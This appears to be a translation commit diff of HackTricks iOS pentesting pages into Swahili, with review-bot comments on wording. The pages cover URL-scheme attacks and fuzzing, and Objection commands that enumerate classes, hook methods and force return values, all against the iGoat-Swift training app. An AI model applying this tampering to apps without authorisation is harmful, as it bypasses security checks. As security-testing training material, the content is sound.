**Haki za Matumizi** ni sehemu muhimu nyingine ya maendeleo ya programu za iOS, zikitumika kama jozi za thamani muhimu ambazo hutoa ruhusa kwa programu kutekeleza operesheni fulani zaidi ya ukaguzi wa wakati wa uendeshaji. Kwa mfano, kuwezesha **Ulinzi wa Data** katika programu kunahusisha kuongeza haki maalum katika mradi wa Xcode, ambayo kisha inaonyeshwa katika faili ya haki za programu au faili ya utoaji wa simu iliyowekwa kwa IPAs.
**Entitlements** ni kipengele kingine muhimu katika maendeleo ya programu za iOS, kinachofanya kazi kama jozi za funguo-thamani ambazo zinawapa programu ruhusa ya kufanya operesheni fulani zaidi ya ukaguzi wa wakati wa utekelezaji. Kwa mfano, kuwezesha **Data Protection** katika programu kunahusisha kuongeza ruhusa maalum katika mradi wa Xcode, ambayo kisha inaonyeshwa katika faili za ruhusa za programu au faili ya mkataba wa simu iliyojumuishwa kwa IPAs.
# Marejeo
# References
* [https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage](https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage)
* [https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md)
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/)
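Review bot: "Ruhusa hizi zinatumika mara moja baada ya programu kufungwa" says the capabilities apply once the app is closed; the replaced line correctly said "kusakinishwa" (installed), so restore that word. Also "Wakuu wa programu" (app bosses) should be "Watengenezaji wa programu", the paragraph "This example indicates that the app is compatible with the armv7 instruction set..." is left untranslated where the replaced line had a Swahili version, "faili ya mkataba wa simu" misrenders "mobile provisioning profile" (suggest "wasifu wa utoaji (provisioning profile) wa simu"), and the headings "App Capabilities", "Device Capabilities", "Entitlements" and "References" are in English while the neighbouring text is Swahili.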
@ -140,16 +142,17 @@ Mfano huu unaonyesha kuwa programu inalingana na seti ya maagizo ya armv7. Waten
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}


@ -1,28 +1,29 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Hii ni muhtasari kutoka kwenye habari husika kutoka [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/)
Hii ni muhtasari kutoka kwa taarifa zinazohusiana na [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/)
## Taarifa Msingi
## Taarifa za Msingi
Mfumo wa URL maalum huruhusu programu kuwasiliana kwa kutumia itifaki maalum, kama ilivyoelezwa katika [Hati ya Maendeleo ya Apple](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). Itifaki hizi lazima zitangazwe na programu, ambayo kisha inashughulikia URL zinazoingia zifuatazo itifaki hizo. Ni muhimu kuhakikisha **uthibitisho wa vigezo vyote vya URL** na **kutupa URL zozote zisizo sahihi** ili kuzuia mashambulizi kupitia njia hii.
Mipango ya URL ya kawaida inaruhusu programu kuwasiliana kwa kutumia itifaki maalum, kama ilivyoelezwa katika [Apple Developer Documentation](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). Mipango hii lazima itangazwe na programu, ambayo kisha inashughulikia URL zinazokuja kufuata mipango hiyo. Ni muhimu **kuhakiki vigezo vyote vya URL** na **kukatisha URL zozote zisizo sahihi** ili kuzuia mashambulizi kupitia njia hii.
Mfano unatolewa ambapo URI `myapp://hostname?data=123876123` inaita hatua maalum ya programu. Kasoro iliyobainishwa ilikuwa katika programu ya Skype Mobile, ambayo iliruhusu hatua za simu zisizoruhusiwa kupitia itifaki ya `skype://`. Itifaki zilizosajiliwa zinaweza kupatikana katika `Info.plist` ya programu chini ya `CFBundleURLTypes`. Programu mbaya zinaweza kuitumia hii kwa kusajili upya URI ili kuiba habari nyeti.
Mfano unatolewa ambapo URI `myapp://hostname?data=123876123` inachochea kitendo maalum cha programu. Uthibitisho wa udhaifu ulionekana katika programu ya Skype Mobile, ambayo iliruhusu vitendo vya simu visivyo ruhusiwa kupitia itifaki ya `skype://`. Mipango iliyosajiliwa inaweza kupatikana katika `Info.plist` ya programu chini ya `CFBundleURLTypes`. Programu mbaya zinaweza kutumia hii kwa kujiandikisha tena URIs ili kukamata taarifa nyeti.
### Usajili wa Itifaki za Utafutaji wa Programu
### Usajili wa Mipango ya Maswali ya Programu
Kuanzia iOS 9.0, ili kuangalia ikiwa programu ipo, `canOpenURL:` inahitaji kutangaza itifaki za URL katika `Info.plist` chini ya `LSApplicationQueriesSchemes`. Hii inapunguza itifaki ambazo programu inaweza kuuliza hadi 50, kuimarisha faragha kwa kuzuia uchunguzi wa programu.
Kuanzia iOS 9.0, ili kuangalia kama programu inapatikana, `canOpenURL:` inahitaji kutangaza mipango ya URL katika `Info.plist` chini ya `LSApplicationQueriesSchemes`. Hii inakadiria mipango ambayo programu inaweza kuuliza kuwa 50, ikiongeza faragha kwa kuzuia orodha ya programu.
```xml
<key>LSApplicationQueriesSchemes</key>
<array>
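Review bot: "Hii inakadiria mipango ambayo programu inaweza kuuliza kuwa 50" reads as "this estimates the schemes to be 50"; the sentence describes a hard limit, so keep "inaweka kikomo cha 50" or the replaced "inapunguza ... hadi 50". Also "Mipango ya URL ya kawaida" means ordinary URL schemes where the replaced line says "maalum" (custom), and "Uthibitisho wa udhaifu ulionekana" (a proof of vulnerability was seen) should stay "Udhaifu uliotambuliwa ulikuwa" (the identified flaw was), as the replaced line had it.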
@ -30,9 +31,9 @@ Kuanzia iOS 9.0, ili kuangalia ikiwa programu ipo, `canOpenURL:` inahitaji kutan
<string>url_scheme2</string>
</array>
```
### Jaribio la Kusimamia na Kuthibitisha URL
### Testing URL Handling and Validation
Wabunifu wanapaswa kukagua njia maalum katika msimbo wa chanzo ili kuelewa ujenzi na uthibitisho wa njia ya URL, kama vile `application:didFinishLaunchingWithOptions:` na `application:openURL:options:`. Kwa mfano, Telegram inatumia njia mbalimbali za kufungua URL:
Wakandarasi wanapaswa kuchunguza mbinu maalum katika msimbo wa chanzo ili kuelewa ujenzi wa njia za URL na uthibitishaji, kama vile `application:didFinishLaunchingWithOptions:` na `application:openURL:options:`. Kwa mfano, Telegram inatumia mbinu mbalimbali za kufungua URL:
```swift
func application(_ application: UIApplication, open url: URL, sourceApplication: String?) -> Bool {
self.openUrl(url: url)
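Review bot: "Wakandarasi" means contractors; the sentence is about developers, so use "Watengenezaji" as elsewhere in this file. The Swift snippet that follows is context only and hands the URL straight to openUrl, which is exactly the spot the paragraph tells testers to inspect for validation; the wording should make clear it is an example of a handler to review, not of correct validation.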
@ -56,17 +57,17 @@ self.openUrl(url: url)
return true
}
```
### Jaribio la URL Requests kwa Programu Nyingine
### Testing URL Requests to Other Apps
Njia kama `openURL:options:completionHandler:` ni muhimu kwa kufungua URL kwa ajili ya kuwasiliana na programu nyingine. Kugundua matumizi ya njia kama hizo katika msimbo wa chanzo wa programu ni muhimu kwa kuelewa mawasiliano ya nje.
Mbinu kama `openURL:options:completionHandler:` ni muhimu kwa kufungua URL ili kuingiliana na programu nyingine. Kutambua matumizi ya mbinu kama hizo katika msimbo wa chanzo wa programu ni muhimu kwa kuelewa mawasiliano ya nje.
### Jaribio la Njia Zilizopitwa na Waktu
### Testing for Deprecated Methods
Njia zilizopitwa na waktu za kushughulikia ufunguzi wa URL, kama vile `application:handleOpenURL:` na `openURL:`, zinapaswa kugunduliwa na kufanyiwa ukaguzi kwa ajili ya athari za usalama.
Mbinu zilizopitwa na wakati zinazoshughulikia ufunguzi wa URL, kama `application:handleOpenURL:` na `openURL:`, zinapaswa kutambuliwa na kupitia kwa athari za usalama.
### Fuzzing wa URL Schemes
### Fuzzing URL Schemes
Fuzzing wa URL schemes unaweza kugundua kasoro za kuharibika kwa kumbukumbu. Zana kama [Frida](https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/) inaweza kusaidia kiotomatiki mchakato huu kwa kufungua URL na mizigo tofauti ili kufuatilia ajali, kama ilivyodhihirishwa na uhariri wa URL katika programu ya iGoat-Swift:
Fuzzing URL schemes inaweza kutambua makosa ya ufisadi wa kumbukumbu. Zana kama [Frida](https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/) zinaweza kuendesha mchakato huu kwa kufungua URL zenye mzigo tofauti ili kufuatilia ajali, kama inavyoonyeshwa na udanganyifu wa URL katika programu ya iGoat-Swift:
```bash
$ frida -U SpringBoard -l ios-url-scheme-fuzzing.js
[iPhone::SpringBoard]-> fuzz("iGoat", "iGoat://?contactNumber={0}&message={0}")
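Review bot: "makosa ya ufisadi wa kumbukumbu" uses "ufisadi", the word for political or financial corruption; memory corruption is "uharibifu wa kumbukumbu", and "udanganyifu wa URL" (URL deception) should be "ubadilishaji wa URL" (URL manipulation). In the deprecated-methods paragraph "kupitia kwa athari za usalama" should be "kupitiwa kwa athari za usalama" (reviewed for security implications).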
@ -74,19 +75,20 @@ Watching for crashes from iGoat...
No logs were moved.
Opened URL: iGoat://?contactNumber=0&message=0
```
## Marejeo
## References
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}


@ -1,36 +1,37 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
Kwa sehemu hii, zana [**Objection**](https://github.com/sensepost/objection) itatumika.\
Kwa sehemu hii, chombo [**Objection**](https://github.com/sensepost/objection) kitatumika.\
Anza kwa kupata kikao cha objection kwa kutekeleza kitu kama:
```bash
objection -d --gadget "iGoat-Swift" explore
objection -d --gadget "OWASP.iGoat-Swift" explore
```
Unaweza pia kutekeleza `frida-ps -Uia` ili kuangalia michakato inayofanya kazi kwenye simu.
You can execute also `frida-ps -Uia` to check the running processes of the phone.
# Uchunguzi wa Msingi wa Programu
# Msingi wa Kuorodhesha programu
## Njia za Programu za Ndani
## Njia za Programu za Mlokole
* `env`: Tafuta njia ambapo programu imehifadhiwa ndani ya kifaa
* `env`: Pata njia ambapo programu imehifadhiwa ndani ya kifaa
```bash
env
Jina Njia
Name Path
----------------- -----------------------------------------------------------------------------------------------
BundlePath /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F546068/iGoat-Swift.app
CachesDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library/Caches
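Review bot: The objection command changes its gadget from "iGoat-Swift" to "OWASP.iGoat-Swift" without explanation; this matches the bundle identifier that `ios bundles list_bundles` prints later in the same file (OWASP.iGoat-Swift), so a short remark that the bundle id is what `--gadget` expects would help readers who copy the old form. Restoring the tool output header to "Name Path" is right, since program output must not be translated. Separately, "Njia za Programu za Mlokole" uses a word that does not mean "local"; keep "Njia za Ndani za Programu" from the replaced line, and "You can execute also `frida-ps -Uia`..." is left in English where the replaced line was Swahili.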
@ -38,22 +39,22 @@ DocumentDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A1
LibraryDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library
```
## Orodha ya Vifurushi, fremu na maktaba
## Orodha ya Bundles, frameworks na maktaba
* `ios bundles list_bundles`: Orodha ya vifurushi vya programu
* `ios bundles list_bundles`: Orodha ya bundles za programu
```bash
ios bundles list_bundles
Executable Bundle Version Njia
Executable Bundle Version Path
------------ -------------------- --------- -------------------------------------------
iGoat-Swift OWASP.iGoat-Swift 1.0 ...8-476E-BBE3-B9300F546068/iGoat-Swift.app
AGXMetalA9 com.apple.AGXMetalA9 172.18.4 ...tem/Library/Extensions/AGXMetalA9.bundle
```
* `ios bundles list_frameworks`: Orodha ya fremu za nje zinazotumiwa na programu
* `ios bundles list_frameworks`: Orodha ya frameworks za nje zinazotumiwa na programu
```bash
ios bundles list_frameworks
Executable Bundle Version Njia
Executable Bundle Version Path
------------------------------ -------------------------------------------- ---------- -------------------------------------------
ReactCommon org.cocoapods.ReactCommon 0.61.5 ...tle.app/Frameworks/ReactCommon.framework
...vateFrameworks/CoreDuetContext.framework
@ -80,7 +81,7 @@ react_native_image_picker org.cocoapods.react-native-image-picker 2.
```bash
memory list modules
Jina Msingi Ukubwa Njia
Name Base Size Path
----------------------------------- ----------- ------------------- ------------------------------------------------------------------------------
iGoat-Swift 0x104ffc000 2326528 (2.2 MiB) /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F54...
SubstrateBootstrap.dylib 0x105354000 16384 (16.0 KiB) /usr/lib/substrate/SubstrateBootstrap.dylib
@ -92,11 +93,11 @@ Foundation 0x1ab550000 2732032 (2.6 MiB) /System/L
libobjc.A.dylib 0x1bdc64000 233472 (228.0 KiB) /usr/lib/libobjc.A.dylib
[...]
```
* `memory list exports <module_name>`: Exports ya moduli iliyopakiwa
* `memory list exports <module_name>`: Mipango ya moduli iliyopakiwa
```bash
memory list exports iGoat-Swift
Aina Jina Anwani
Type Name Address
-------- -------------------------------------------------------------------------------------------------------------------------------------- -----------
variable _mh_execute_header 0x104ffc000
function _mdictof 0x10516cb88
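Review bot: "Mipango ya moduli iliyopakiwa" translates "Exports" as "plans"; this is the Mach-O export table, so keep the technical term as the replaced line did ("Exports ya moduli iliyopakiwa") or use "alama zinazotolewa (exports)".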
@ -115,9 +116,10 @@ variable _ZTVN9couchbase6differ10BaseDifferE
variable _ZTIN9couchbase6differ10BaseDifferE 0x10523c0f8
[..]
```
## Orodha ya darasa za programu
* `ios hooking list classes`: Orodha ya darasa za programu
## Orodha ya madarasa ya APP
* `ios hooking list classes`: Orodha ya madarasa ya programu
```bash
ios hooking list classes
@ -135,7 +137,7 @@ AAAppleTVRequest
AAAttestationSigner
[...]
```
* `ios hooking search classes <search_term>`: Tafuta darasa linalo zawadi ya neno. Unaweza **kutafuta neno la pekee linalohusiana na jina kuu la pakiti** ili kupata darasa kuu za programu kama ilivyo katika mfano:
* `ios hooking search classes <search_term>`: Tafuta darasa ambalo lina neno fulani. Unaweza **kutafuta neno la kipekee linalohusiana na pakiti kuu ya programu** ili kupata madarasa makuu ya programu kama katika mfano:
```bash
ios hooking search classes iGoat
@ -153,9 +155,9 @@ iGoat_Swift.MemoryManagementVC
[...]
```
## Orodha ya njia za darasa
## Orodha ya mbinu za darasa
* `ios hooking list class_methods`: Orodha ya njia za darasa fulani
* `ios hooking list class_methods`: Orodha ya mbinu za darasa maalum
```bash
ios hooking list class_methods iGoat_Swift.RCreditInfo
@ -169,7 +171,7 @@ ios hooking list class_methods iGoat_Swift.RCreditInfo
- initWithValue:
- setCardNumber:
```
* `ios hooking search methods <search_term>`: Tafuta njia inayojumuisha herufi
* `ios hooking search methods <search_term>`: Tafuta mbinu ambayo ina neno fulani
```bash
ios hooking search methods cvv
@ -186,21 +188,21 @@ ios hooking search methods cvv
[iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:]
```
# Ufundi wa Msingi wa Kukamata
# Msingi wa Hooking
Sasa umepata **darasa na moduli zilizotumiwa** na programu unaweza kuwa umepata baadhi ya **majina ya darasa na njia ya kuvutia**.
Sasa kwamba umeshawishi **madarasa na moduli** zinazotumiwa na programu unaweza kuwa umepata **majina ya darasa na mbinu za kuvutia**.
## Kukamata njia zote za darasa
## Hook mbinu zote za darasa
* `ios hooking watch class <class_name>`: Kukamata njia zote za darasa, kuchapisha vigezo vya awali na kurudi
* `ios hooking watch class <class_name>`: Hook mbinu zote za darasa, dump kila wakati vigezo vya awali na marejeo
```bash
ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController
```
## Kukamata njia moja
## Hook mbinu moja
* `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: Kukamata njia maalum ya darasa na kuchapisha vigezo, nyuma na kurudi kwa njia kila wakati inaitwa
* `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: Hook mbinu maalum ya darasa ikidondosha vigezo, marejeo na marejeo ya mbinu kila wakati inapoitwa
```bash
ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return
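Review bot: "umeshawishi" means "you have persuaded"; the sentence means "now that you have enumerated the classes and modules", so use "umeorodhesha". In the two `ios hooking watch` descriptions, return values are rendered as "marejeo" (references) and backtrace is also rendered as "marejeo", which makes the last one read "marejeo na marejeo ya mbinu"; suggest "thamani za kurudi" for return values and keeping "backtrace" as a term, e.g. "ikidondosha vigezo, backtrace na thamani ya kurudi ya mbinu kila inapoitwa".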
@ -208,13 +210,13 @@ ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPresse
## Badilisha Kurudi kwa Boolean
* `ios hooking set return_value "-[<class_name> <method_name>]" false`: Hii itafanya njia iliyochaguliwa irudishe boolean iliyotajwa
* `ios hooking set return_value "-[<class_name> <method_name>]" false`: Hii itafanya mbinu iliyochaguliwa irudishe boolean iliyoonyeshwa
```bash
ios hooking set return_value "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" false
```
## Jenereta ya Kukamata
## Tengeneza kigezo cha hooking
* `ios hooking generate simple <class_name>`:
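Review bot: "Tengeneza kigezo cha hooking" says "generate a hooking parameter"; `ios hooking generate simple` emits a Frida hook template, so "kiolezo" (template) is the right word: "Tengeneza kiolezo cha hooking".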
@ -264,16 +266,17 @@ console.log('Leaving - setCvv:');
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks katika PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
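Review bot: the three "Support HackTricks" bullets added here ("Check the subscription plans", "Join the Discord group", "Share hacking tricks by submitting PRs") are left in English on an otherwise Swahili page, while the same block in the WebView Protocol Handlers file of this commit is translated ("Angalia mpango wa usajili", "Jiunge na kikundi cha Discord", "Shiriki mbinu za hacking"). Suggest reusing that Swahili wording here so the header and footer blocks are consistent across the translated files.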

View file

@ -1,34 +1,36 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
